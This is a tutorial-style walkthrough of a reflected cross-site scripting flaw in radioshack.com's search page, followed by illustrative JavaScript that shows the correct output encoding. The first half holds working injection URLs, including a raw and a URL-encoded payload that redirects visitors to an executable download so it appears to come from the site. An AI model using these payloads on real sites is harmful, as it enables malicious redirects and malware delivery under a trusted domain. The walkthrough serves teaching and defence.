Without viewing the source it's apparent that our test string has been significantly altered: ,:;\'"<>()[]{} has been completely removed from our search. But how much of this happened client-side? Let's take a look at the current URL.
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testa.&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=
By changing the kw field to our original search string we can create our own URL and see how reliant on client-side validation the site is. Our new URL should look like this:
http://www.radioshack.com/search/noResults.jsp?useCatForBc=1&bcLinkAll=1&sr=1&kw=testA.,:;\'"<>()[]{}&origkw=testA.,:;\'%26quot;%26lt;%26gt;()[]{}&kwCatId=
Things certainly look better, but it's still possible the search is secure. To find out, we'll have to view the source of the page. Looking at the first match for testA, it's apparent that our search string has been HTML-entity encoded.
<input type="text" style="font-size:10px;width:164px;" name="kw" id="kw" value="testA.,:;\'&quot;&lt;&gt;()[]{}">
This complicates things, but an attack is still possible. Let's look at some of the other results. Near the bottom of the page is the following block of JavaScript:
var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='testA.,:;\'&quot;&lt;&gt;()[]{}';
var s_pageName='Search (internal)';
Because the single quote character is passed through unencoded, we can easily inject code here. Consider what would happen if we passed in ';var x=' as the keyword.
var s_account='gsicrsk';
var s_server='www.radioshack.com';
var s_hier1='';
var s_eVar19='67340647933';
var s_channel='Home';
var s_eVar3='';var x='';
var s_pageName='Search (internal)';
At this point we can write any JavaScript we want between the ; and the following var x, provided we don't use any of the encoded characters. As an example of what can be done with this, we can craft a URL that redirects to a download, making it seem as if it's coming from www.radioshack.com.
http://www.radioshack.com/search/noResults.jsp?kw=';window.location='http://download.winzip.com/wzd/winzip120.exe';var x='
And again we can URL encode the payload.
http://www.radioshack.com/search/noResults.jsp?kw=%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%64%6F%77%6E%6C%6F%61%64%2E%77%69%6E%7A%69%70%2E%63%6F%6D%2F%77%7A%64%2F%77%69%6E%7A%69%70%31%32%30%2E%65%78%65%27%3B%76%61%72%20%78%3D%27
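The root cause here is an encoder chosen for the wrong output context: HTML entity encoding neutralises "<> in an attribute value but leaves the single quote untouched inside a JavaScript string literal. The block below is an added illustration, not radioshack.com code, contrasting that encoder with a JS-string-literal encoder and adding a small check that the emitted statement is still a single assignment; the function names are my own.

```javascript
// Constructed example of emitting a server-side value into an inline <script>.

// Flawed: HTML entity encoding. Right for an HTML attribute, but inside a
// JS string literal the single quote survives and ends the literal early.
function htmlEntityEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Correct: JSON.stringify yields a valid JS string literal (quotes and
// backslashes escaped). Also escape '<' so the literal can never contain
// "</script>", and the two line terminators JSON leaves raw.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderVulnerable(keyword) {
  return "var s_eVar3='" + htmlEntityEncode(keyword) + "';";
}

function renderFixed(keyword) {
  return 'var s_eVar3=' + jsStringLiteral(keyword) + ';';
}

// Index just past the closing quote of the first string literal in a line,
// honouring backslash escapes; -1 if the literal never closes.
function endOfFirstLiteral(line) {
  const start = line.search(/['"]/);
  if (start < 0) return -1;
  const q = line[start];
  for (let i = start + 1; i < line.length; i++) {
    if (line[i] === '\\') { i++; continue; }
    if (line[i] === q) return i + 1;
  }
  return -1;
}

// True when the statement is exactly one literal followed by ';', i.e.
// nothing from the keyword escaped the string context.
function isSingleAssignment(line) {
  const end = endOfFirstLiteral(line);
  return end > 0 && line.slice(end) === ';';
}
```

The check also explains why the original test string caused no breakage: its \' is a valid JS escape, so the literal closed where intended, while ';var x=' does not.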